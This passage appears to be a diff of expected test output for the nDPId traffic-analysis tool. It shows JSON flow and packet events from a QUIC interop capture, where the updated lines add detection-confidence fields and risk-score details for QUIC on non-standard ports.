o6wMhEP7UVS6LQVCbX\/F5hZ42FQPL174ha0Yjp7fot\/ow92n0s8sDYpXdyVzzUtmI9H59mtClZBkXIm4hCy5YwKUBE5Htf0HL6v7tX\/C56I4bHgjD1kXDqKwEusnGxfxLkbm5cB84\/UPVfX54l5AlcUWrKt\/sWPHXza3lrXmjl3iKLayJGvSvxgwAyLdj+1dAf2mHjT3T9ZeLg4TPyNz17SLyKDROZpbuZtC2zCbnl+NoReuXxIIu553FeA7K1Fq06E+HYHhMw9+fWseAQfiQhoIBqlHGL+6zzFwJx8LqsX2kF9IlqJJkfGxh2dCK8J4o5uVhtnU3J2xj0GDXLtBrNSCk7DDd67hChkNkJ\/zra77RGExcKdo9KUDUUYykOLFAbdNAsP9djZJfE2+FIW26Q0ve6PvxjGma3cI1DAbfodw3x7gmpMenGXbAesto3GigfY8Dqk5DyVN2us4Q8jxijjrwa1uGb6WCWFIbPGsRxa2EtoUIAHsP\/pagnvZR1tK2myhxOFZczPeNlpxk1o3SOIXdZrMfCNqe8UgV89dZHklMi3hgQCyoO5n2p9n2UNtckDsulzdkWAkN7ELjfKSw3xLKX8QYYwRNZkrnslYV\/gNUyPn\/DAHxcrYsCggnVPpcMfjQHnjiySyU7agWUfxfnrK5KR0Hz1uxcerQD9r2dHrU5GwRgAJqiERgTrm61j0\/9g6EnJzaJxnY2YL\/8StPHOT4TbswEzgPxmOMhq3B3NyVJmRRvGKyoWosF33+eeRJZtqDmGzt7Y\/QslvmPGsoNyGhIfWD4qHCWm8JN2zWi8NKuiyFpgsC\/gseqp2COjYeHLzTsHE8Lb24ziOBbxiS8nhlUeyvkTXTnPgtpZev\/ducm+wW0A+YY2gp+9vovT+lMYKPoIIeW89qmvsTK34QrhAHBV8Gdi7IG6oE67NdkIrFleG4EtBQyuNTVG\/Hni6IlsFEhmcMOi9gtqRQF0bots7U2r2su6TX5cs\/tWsUtfcKDq01p1Oi+UeZRz\/V+lKX5GfCRE\/JIN8wqGMoYFzwTiwgXQFJuV\/tc8U4uoRYgnau5MAB9+BYOU44CnqwsIla5AaVfMisOMnVZhANbfOkDwWOMuBcFcvM4iPJEdLrpJXtiL7lozz\/DNjHrb6qIdiWBMUyCod\/1w5XY81jvBVw6EPdS52X\/61VYwnM6etnlrj2efLI9zOedaqcKmUUuU5hMhqfCCW6Ds62KH8dV8j+mD8L1skbcaPGiQBq8L77krzCDv+w=="}
-00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434586,"flow_last_seen":1603816434586,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434586,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":39624,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.tech","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434586,"flow_last_seen":1603816434586,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434586,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":39624,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.tech","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434587,"flow_last_seen":1603816434587,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434587,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":59171,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02148{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1603816434587,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434587,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUA73RAAEARuC\/AqAGAwb4KYucjEVEE7DgFzwoKCgoIOPxKwZ+D2JAAAETS91nHeEtqNVprqBpjlBuMS4qDhd3kUN8qDrM+F\/ekloYAYgcZUMLt8kdbAj4yNgXM150XEsSqUaY2u+NNo8mFZEwXy2OnYTv\/L1pA2ooV9c\/qfb6IQtVvpkYCa79kPBP0tyFMp4w86ypVGLJRFE2wcR8W+ufL4zQbFmHQUN4s8EKBgftF0IZ9d+hGzrCohfVKAmj2TbAATwLc5qROqnCXSPAAIwsgXC6FvxeRe5C81GzRnEFcVKohNWvuH+YgU\/EQzJ8x0h2o1KXN+x2kz8nNm4RV\/bBgatrr3rE9I9H9H7X4vNkwSkPN1LE\/7YLaXxFkeX+BvfHM9pLsCwVYI43jNMZK\/82M5vqAJwLAoGNaMNRy1bvSqZ2Qnqs8doUi12HdtkWRB7hy4DLBCO6i\/WKQJjLKdpFeD7phx\/6P3mBKcjDeMOT9LGfsfpWDEggtVg0K+PNic2DC+MGaabHUIfDeFXxZwVJQjnBWnr7uiJ1+uGYObevmoi83q\/oHGzH2zJ45l2SHUS8N5EDtYU7jRJ0C0k352go\/BLzWhvpxttBJ0HkbJN+Lf8iGQ7\/HNrO0sSvxhBlXfXloOUmwXwy4ZOiFy754b5M3BhRivvL68fxBqtVY1N2wA1osEboLNfPnmjiBhXxUugq2mfHLbsnTaxih+guwrlRqVVQng52RQJYpjyC\/IQpqxIgm\/p+tg8gZMclfhCysFzs0Sx7c51U8U\/eV6RVzg4J9aZi1F6t1E9qqrDD9rTgXDBFK+53U4dmwwrA3ilycimT\/hbzORA3BufMgHAOtz3cpn\/t7KLfrocmCHydxweYPjYv8od0eN7GuRZC\/Dkkx5pLEApXJKbDycSs4W77Wi8NgAqHOpGnI10QBHXyfFP+YPX\/MbUtvkqyBKvQeesidGlYsUe0gYlnKX1yYRVG\/iKS0PMJZC3FHvFiL6obiVGRuwwpTV3d7lkotBNp2jqZCw1NLWglC1fuu1coZsHS72tmzKvcBFgtdmqwenN1JrK8F5rdOVfBQ8yE66XD3W8yAjlz\/Qvq\/DIB7QOU2zYdRo\/xweEsuV1v5VGk+8J0AJw0wbBWw2a7KJD1o3bx\/fl3Fi0jbHAOf1Fon8qpBSfuKwo0q4+YMAnbX13uRf4o0syD1YOszGCYMMZmBO0q\/PYK7xkQl3CoFVjP6bHq4sVQrk6j7MBPS838Z1ManSJBz3k+oiO\/sknlDJhNUIHfSq8TgRjn5JEi1pn2KhrqsPoB73ZpXqkfBB7bu8rzkBoJrWwjjZeFkHJOfD8ToexbXz43k\/IjggUNPy2WSLw1q33LeO+gOH5GXB9\/QgYQ697NrQKVyKlRVZXeNUwnQS4zycuS8PuKHeqfdW9Z+9PEo4DpPFRu+B7BfvVgxbF3wCCeyZwvtKZFkAMhl54zHOUC4V5hgvug19KxTuTtQDyeR7SJbTf3aDyi+uN2eX72\/wUD5r\/K2ChPZ9Gse97JUpH8JYVHPwSDEUEO85gNWGwO2wDrwXcE1X7p+U2f6nsA1R+bUBz04uvKlIU4Sa3pHvuKQRjh6XPQ2ThEX3UW558Xx7NikbDf\/f1LNSL9NCOFEeMnTLHFDcVVOXK5I01l4ewmR2fHvlVQvWH\/bOr5xDcwdY+kNlEO6n\/7tlWOai8jsYPqutA=="}
-00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434587,"flow_last_seen":1603816434587,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434587,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":59171,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quicker.edm.uhasselt.be","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01007{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434587,"flow_last_seen":1603816434587,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434587,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":59171,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quicker.edm.uhasselt.be","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434590,"flow_last_seen":1603816434590,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434590,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":35643,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02139{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1603816434590,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434590,"pkt":"pJGxgjQ5PKn0qB\/sht1gCk\/uBNgRQCABCwcKydWupNP+R2kegH0gARnwAAQANAAAAAAAAAABizsRUQTY3hvBCgoKCgg1RfSbShWYtQAARL7tTf7Q3DPhiEmC4nM7FyCePUSXuhX\/xJUKDzdA3Dndh7i7AZ7IYGRP1Yj0EuU9mm9YXASeUAKarL7NfQFkziaDEWFlefwq8ZzHKOgKpSqZeoocfYxvZJ8CSRvYoWz\/L6jmv6jaQeOLENERntb1qDtsRo5+v992QGLT9TUEMVkwT2FvUb5KMSqTvrwWgkM2hgSTV4EyBe1D3gc0yLlWmSFz3jz3ijFR560nQwOMUo4q8F8wUAgTdOAVJvBGKThzf\/CoAwD57myBv4uKJMnypuTatEvPlB46uv\/yty2eheod7+0rebXxYj4Uc+UqPb9wT8PhoyG868QW5UmJx34aYK7eN3JuR15+ImKbVmoE6EL83PSKYkHyQopRIotBEKQDm+GsSi14PMbpT\/MRFwhAVJ+sQdlkceub2KUXDJHao+eBA5w8vGU2OKSHGw6MFHU+N+USgIVLGu8C0b2WNKFbDS9r1lqcSYhWRSXCnwTaP8cP1GWArgqHq4NJrJMJXD+xs1H+vApBkOM\/ZeUAGUAtTfkrI5gOusV9oUnq2ItgMvR76a8xKxY\/SiVzw7ucrWK5N2tQ5JkPI\/NGcIpsYWE01h06TOMdCUToNwiJfkP0MPn3vMz2JyLbhE71KWygYVxZlHissMIrLNj2hzs1t4mgi8Dfs0l9RtozbB15+zjCqfBYkvDNCXVfu0MO1trH5LQH40Myn9bZeAAzq9F2i07k2zD6tl2iozB832XjSA\/tFg7fJub\/mksvHDenolmTIZGI4wO5Z3NTh426m1Xr55i+p\/4y\/Q9IBI2x3X4SBvQZun3kWH6dWj67baJqzcocTD7LnXnDRN2eJnB0+m+Xkg+SR2CQD8FNHBCSnN7Yu9TN7g85clS9FrvmkHqNboNkc2KyQf9kCWlFhRrzo5YX6fx357\/JlHGWmF2cH2EDuHHJfgxwA9G7HuV2intBnLuQm+sJuJfIh6mRTKTYdC1aBxO+FJkXatzCzuj936XOJG7cJwInBtGXzIe7oIez0hn4nIWhuMBVQhhszVOH9hqsvsKAdbnYUdNA1USW6D7R\/xmghiopDfGtjIWLxZREthLkrTZvJPOso30GmJwYCSy+9OZoV2Nj47lGe912feEm235ruyUlWsQTuKpfyC8J7r+SbB5tplBhKbatYRidI3hpJ2q8lvOUBcxy5jvAvjqVG768S0brsL7G6C2TqvMZt\/zTMuDkIHPjWiNDebCJ\/p2a5kYJOC4jhcbwjh\/tz0WznkGbQNVpLag1ovorvXAKpAYOP3LJnhQhOOuZLuZrJxyhVrae9z9d1NLFL8OUzD\/ZclBspPNm3p1e1A75CP6tZBmrEoDhbY1SV4p4vv10\/MMVCqO2nZs0ov\/lFT0sC7weM0SiUoUILcoLsraaHxz2srKVBtLbHRHf5VErVRNyjOmGUC3wJs6R34sc\/8zeM+d6HZcDlUk9ii7+g55y3G7oiGyj1ls\/gUdh7+ZhHGeX9MFF\/5EajWroXTez4lAWvOzswVIh9B6VOueE+IAtyKSx63VOgxYY7yYRidJ+wxQsHNXarhpUCSPeTmkyBv4qdWIHzyXgiUcAahzyxWMUHmvyy0MueTnQQdoRS92QfxncoT12pzPDDw=="}
-00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434590,"flow_last_seen":1603816434590,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434590,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":35643,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.rocks","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01022{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434590,"flow_last_seen":1603816434590,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434590,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":35643,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.rocks","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434595,"flow_last_seen":1603816434595,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434595,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":56213,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02139{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1603816434595,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434595,"pkt":"pJGxgjQ5PKn0qB\/sht1gBnpkBNgRQCABCwcKydWupNP+R2kegH0kAIkCAAAAAPA8kf\/+aaRU25URUQTYvvrACgoKCgj9UoceU8iiQAAARL7az3aryiG\/WW4QSFw5q8b+\/qI9una68JfIBN5RDAlSWxI5aN9NrGnm63U\/Z5hZqT855BEAbzFsnSq9T5UoQJSQWJO+OxKLmuziQZO7srez1fkkDupTN1wkkdnmywDXZcMkFQ4tXNVtGsfMIyPoMOjkuNgYuL+TrFwg96COI8IOfhzUGRFJf8K8t+t3YLfMWc5IM3WJ\/phaCjLWvabCUhYVrFgZVTenSIvn8FoTPxqo1m1xa4G3n8d3o2zFUc4XDalUQSYfIsGCZ\/3VGNAlkjuVi1uuzvCOp0qJEHMlsJ6OjaNJzjSj1b5X311lbaXLxEgAACVJ7mOpBMH2eUKlimPQIRjgO8DFiVT1VtetHEHo7XxD9z9DaojFHhQILu9Ndy7QJYx+8OxPwi0k7EQtFKIeO3QhbI3teT8NwQXlJnQv\/J7yzTNnMCu3L9LWIn6C92d5qUB+1utWZXR28cNynLbRjuRNINQIzfTFmS9iOpbZglrT\/GnsqhcaOJm2t9XrSu4yCE5z0c4wHo6GnMAN05DOXBY0yYPljkh7vr4aKEDxXsaCMcwmcWxYnUlFep8Gex3JVoSlUGz95+zuvHb46+MC+XDiipznc431Qn7rrxOB6lgYcTG7kLf\/ZmPHxmDGAINfIYtZO7xiSc5JWwhUA4ikdzTJaE0uo\/HCIsdSFQFJJlEXfiQ6f+9Lg4o4oHt\/v4TQTOThiS8hA3g+cEIozsYToLOF02tEqrwi5BbfszIjeKKW+XlfuQgTXnd+fgE5dAu5Oc7BakCjmnGBb3Uz3ugNj5DTo6+ojP6UY2IU771P\/fqTADAKhT3onheWYJvxAkrQZHLnIxcgu5DA\/5Es1ztGUo\/es0BosHYusWos2FbBdJpxb+gu5rvMEmPCkuCIpZpBZLLug0rWMitGXgJfX9MWvPAjBWdKWTbvcBzKFwh5+\/1ocEXw0VaT+NsU2weQMCO1YYpPIlc+42jUQfCx0zKYejhkxNEoAo38Q29iwZcFALT5rf0jYyMQpMUMcNFQQqqzbrcaHvvgWQzH+lUkFSqbhBqtX5WCPuLWxkDb\/9GhQLNx0Q1IujSYwA1SIvLeb9bsrMAWKENc82M+Wwn3RcXpJ4cDa0hrN+3NcY\/5t1ve6RDek\/0oY6QGGW1JE\/CmiO8t+4Q02FuHroDarDyPM4tHJeLOT2NE6bUo4WRjaSNVu5ng0Eq9X3XBmx0Ikdv91XlzFM87UC5R3r52ZTZNTnO+xLkNyA4Cub32cJnhUFmGLoaAmiMCxezGxr9YUy9YTVqutoTlfA5jfzAmMWcvfXhM8IAoJ7O2szD5hCSuJ8MX3ML7TFR9jrMTogwqPbeDECUgOiFmruVR0+GuDJb2riqtAhc7PvwbnCVPAYbBoyaoy31mi2TG71Wi\/w4IaZaos63DgLgXPzRaSbjG1c2zVPlGYLiTfXzEyhvOk3Mv8aR0DqJ\/gqVm0SvfiOZnBGk5gzICSopKt52HHnW1EwSPCiNSbMh18YFppr0G1bbAe15xP1\/\/Pk0jzR\/wXBG5JS37im5z+jqUQpnV5dcnvgYoRjpgGuTxRGXLjRfoOGzSlFstUpRTF+iEOL+rt3XO56SlECJkrsnzQoo2ccoM5Hgg7A=="}
-00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434595,"flow_last_seen":1603816434595,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434595,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":56213,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"nghttp2.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01036{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434595,"flow_last_seen":1603816434595,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434595,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":56213,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"nghttp2.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00642{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434599,"flow_last_seen":1603816434599,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434599,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":52080,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02140{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1603816434599,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434599,"pkt":"pJGxgjQ5PKn0qB\/sht1gBgPLBNgRQCABCwcKydWupNP+R2kegH0mAB8YIxDSMFEDfZ59dTdPy3ARUgTYU5HKCgoKCgjzn\/uzo5TjaQAARL4oIwXE1bV3X2RQF+ON3RTsnJX4an3jVlQ7KRPGPw\/cd1gZtN4yjes7ivlyOcq2vm957CNTb4Z32AWph+bIp0qE95znKWOclgtBgRpaMvlLDlaUbTJ1Kjqhg7PudTMGHo8kc8ERMms7zx2J4fSxALfbKS3w04Pkl3fNYWkwJZG9jA2z+7UujsQZ2YxzLHhbiMSZctmG+MqTnAcyQxUOVqOLFrLaBhAxisgQ5MezG68hwcDBiS0ypz8ByM9sY1JtZ4VMrD6ux21WiJ\/gTvOv91V5Grp5XnTWdbnNLG7GrfS3jGjTn2Un\/r3WCKJ0WajhNLHmPUR9BFLSVFG5JiyNgIWA0\/HgJTXD99jRhJkBHyvLeL3j9ePlCvGQ9KCY7A+MdgP5+hrP1QLH82VspHtB2VvSSvMREFxd8jKlKrGybrolBflILJX4GGJlg2hWcC+HeiZGufy5yPCOCbIVpSVQOMyBBe\/Ph0aL\/4q+E+2qJVdBHso12q7ZRf3KyV6KD\/C8p1m5HJ5lk4kmjjCsWakG5crp0wLCKMw1zK5GEWknO8UExqKvojXXFzU2Be74eZgjrj394KHSeeH524syPc8swoO75W7hTdsrJB\/rbuBB+sKBiDCauvTcD0r\/ZL2kwgN2l\/QahiKQcXG7cPXaL3PMAV+\/0HhLKSqjypOevG9iWlPhJOE9CkOrIJqW9G8TK1GKGdKLlPqAZLZ9m71TcFKjQ2zo2h9JsVhhsxqsVTUojf9bVe63KowZvJiNw7kbG5Dx9zv3qk76Scw0pW+2ZZHPjdRZTjmKSA5Y+PYOoxxOicDP9ZVOp+8YwJbnh4YepP36tZkoI4e5hYmgEwZOjt6Yo4GxIrGzuNcUfaa96FJIqS3n0i7MAiXzBsvTUSDnlPJz08s7uoWN3Db9JOSBxZX5qHn+WlZCt6oEKkU8FdQI+7reYK7AI5cK+7Fg6zvWA0dR4F7VGaHhGDIqy3gLf7KmEEyWYRoePUORLvgVC8XTilGAf6Bjlqx9PRGxm0Ja\/4HplWikLpRAYamguRrJONKI6nEhSn9lO27tMAcOTn8Tf6RTu95+ny6hbgPd\/mMKokSGNF7UUtZjCk6cbVH3J7cHgGQXOTjQysmlrFxV2bF8LUmKKxWDOYfmVKmHvf7ramU2h+1zK66w6qsQI2OFBYV6F\/QBKPRxAQlchq5r5kgySGLxmw3m6+Sf6hz7sbVIbyNA36ENRVuZXdVSayaI5VXU677nJtG12s5uEZtWJqnu3YVN\/KK+kE1AeI06S1byEfRfdS5qQoFDC+c6GGJFo5dVEZxLnoVZC3EhBh7dWvLthE6jKMd3CbXVgnSRl9JPjiWwsbn7FBHeycKSDuew5OQ1HtZpeRUJUk5nMgSUOUI0YZ50IJIEFtw5YNao7Ddw10e\/\/nmynctyewik6Tvc8zLrSWaSqgViA6i2PaP6Pv2MZCMyK\/X3XqMdRGKXZs\/jr8\/dMBZX3F\/DYmeMdlamiU1RcDJHP8r+9yBXO9yUXOhN7Pnl31zJ6vG4vR0yXekz\/kuQnX3VMYt3WopVdGtyLE43Smp\/Tz11cx6MymTg0YsqpJ+vSsiBwEm1Kebt\/+JMBAhlGhj5jM9y3tuD9xf5ApCnIw=="}
-00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434599,"flow_last_seen":1603816434599,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434599,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":52080,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"test.privateoctopus.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
